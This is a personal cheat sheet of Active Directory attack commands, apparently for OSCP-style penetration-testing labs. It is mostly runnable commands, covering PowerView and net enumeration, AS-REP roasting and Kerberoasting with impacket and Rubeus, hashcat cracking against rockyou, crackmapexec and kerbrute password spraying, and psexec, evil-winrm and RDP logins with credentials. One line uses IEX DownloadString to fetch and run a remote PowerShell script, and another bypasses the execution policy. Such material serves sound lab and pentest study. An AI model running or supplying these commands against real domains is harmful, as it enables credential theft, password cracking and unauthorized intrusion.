Powered by

AD Cheatsheet

Active Directory Methodology

Mindmap = https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg

AD Enumeration - Using net user /domain - PowerView (Users and Groups)

Repeated Enumeration - Get-NetLoggedon | select UserName ⇒ get all the users logged on the current machine - Get-NetSession ⇒ List of active sessions on the current machine - Invoke-UserHunter -CheckAccess ⇒ checks if domain admin is logged onto any computers and if we have admin access to those computers

AD Exploitation - Kerberoasting - AS-REP Roasting - Password Spraying using SMB/crackmapexec (after getting creds from kerberoasting/as-rep roasting) - Cached AD Credentials using Mimikatz

AD Lateral Movement - Port Forwarding / Tunneling - Overpass the Hash using Rubeus

Accessing AD machines - RDP - psexec - evil-winrm

Attack Privilege Requirements -

Kerbrute Enumeration - No domain access required Pass the Ticket - Access as a user to the domain required Kerberoasting - Access as any user required AS-REP Roasting - Access as any user required Golden Ticket - Full domain compromise (domain admin) required Silver Ticket - Service hash required Skeleton Key - Full domain compromise (domain admin) required

AD Enumeration

net commands

net users ⇒ display users from current local machine

net useres /domain ⇒ display users from the DC

net groups /domain ⇒ enumerate groups on the DC

net localgroup ⇒ groups on the local machine

net localgroup administrators ⇒ groups that have admin access on the local machine

net group “Domain Admis” /domain ⇒ get users within domain admin group

net group “Client Admis” /domain ⇒ get users within client admin group

Enumeration using PowerView

PowerView.ps1 - https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

Load and Run PowerView.ps1 script using powershell

IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.1.1/powerview.ps1')

powershell -ep bypass - bypass the execution policy

Import-Module .\PowerView.ps1 - Importing PowerView to memory

Get-NetDomain - Obtaining domain information

Get-NetUser - Querying users in the domain

Get-NetUser | select cn - Querying users using select statement

Get-NetGroup | select cn - Querying groups in the domain using PowerView

Get-NetGroup "Sales Department" | select member - Enumerating the "Sales Department" group

Get-NetComputer | select operatingsystem,dnshostname - Displaying OS and hostname

Find-LocalAdminAccess - Scanning domain to find local administrative privileges for our user

https://book.hacktricks.wiki/en/windows-hardening/basic-powershell-for-pentesters/powerview.html?highlight=powerview#powerviewsharpview

Get-DomainController

Get-DomianComputer | select sameaccountname, cn, name

Get-DomianUser | select name, memberof

Get-DomainGroup | select name, member

Get-DomainGroupMember -Identity "Domain Admins"

Get-DomainGroupMember -Identity "Domain Admins" -Recurse

Get-NetLoggedon | select UserName ⇒ get all the users logged on the current machine

Get-NetSession ⇒ List of active sessions on the current machine

Invoke-UserHunter -CheckAccess ⇒ checks if domain admin is logged onto any computers and if we have admin access to those computers

AD Exploitation

AS-REP Roasting

  • On Linux -

    impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete - Using GetNPUsers to perform AS-REP roasting

    hashcat --help | grep -i "Kerberos” - Reviewing the correct Hashcat mode

    sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force - Cracking the AS-REP hash with Hashcat

  • On Windows -

    Rubeus - https://github.com/GhostPack/Rubeus

    .\Rubeus.exe asreproast /nowrap

    sudo hashcat -m 18200 hashes.asreproast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Kerberoasting

Kerberoasting ⇒ Any user can get a service ticket for a service account ⇒ service ticket is encrypted using a service account hash ⇒ crack the hash using hashcat ⇒ spray password using crackmapexec

  • Windows -

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast - Utilizing Rubeus to perform a Kerberoast attack

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force - Cracking the TGS-REP hash

  • On Linux -

sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete - Using impacket-GetUserSPNs to perform Kerberoasting on Linux

If impacket-GetUserSPNs throws the error "KRB_AP_ERR_SKEW(Clock skew too great)," we need to synchronize the time of the Kali machine with the domain controller. We can use ntpdate or rdate to do so.

Looking for Service Accounts (SPN - Service Principal Name)

If SPN is set ⇒ It is a service account

Get-DomainUser -SPN ⇒ Find service accounts

Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath ‘c:\users\public\HashCapture.txt’ -Width 8000 ⇒ get hash

hashcat -m 13100 -o cracked.txt -a 0 hashes.txt rockyou.txt ⇒ crack the hash using hashcat

PsExec

Sysinterals - https://learn.microsoft.com/en-us/sysinternals/

.\PsExec64.exe -i \\FILES04 -u corp\jen -p Nexus123! cmd

Linux - impacket-psexec oscp/emmet@10.10.1.202 ⇒ get access to shares and shell on machine

winrm / Evil-winrm

evil-winrm -i <IP> -u <username> -p <password>

Hashcat

Crack passwords after getting hashes from AS-REP roasting or Kerberoasting

hashcat hash.asrep /usr/share /wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

Crack Zip files

zip2john it-users.zip ⇒ gives hash of the zip file

john it-users.hash --wordlist=/usr/share/wordlists/rockyou.txt ⇒ crack the hash

Search for local.txt/proof.txt files on Windows

dir /s/b local.txt

dir /s/b proof.txt

dir /s/b *.txt

dir /s/b *.log

local/proof screenshot

type proof.txt

whoami

ipconfig

hostname

=================

Connecting to RDP

xfreerdp3 /u:<username> /d:<domain> /p:<pwd> /v:<IP>
xfreerdp /cert-ignore /u:<uname> /d:<domain> /p:<pwd> /v:<IP>

Hashcat

https://hashcat.net/wiki/doku.php?id=example_hashes

hashcat -m <number> hash wordlists.txt --force

Active Directory

Password Spraying

Crackmapexec - check if the output shows 'Pwned!'

crackmapexec smb <IP or subnet> -u users.txt -p 'pass' -d <domain> --continue-on-success
Kerbrute
kerbrute passwordspray -d corp.com .\usernames.txt "pass"

AS-REP Roasting

Hash of AS-REP Roastable accounts

impacket-GetNPUsers -dc-ip <DC-IP> <domain>/<user>:<pass> -request

Kerberoasting

dumping from compromised windows host, and saving with customname

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast #dumping from compromised windows host, and saving with customname

impacket-GetUserSPNs -dc-ip <DC-IP> <domain>/<user>:<pass> -request #from kali machine

hashcat -m 13100 hashes.txt wordlist.txt --force # cracking hashes

© Annsh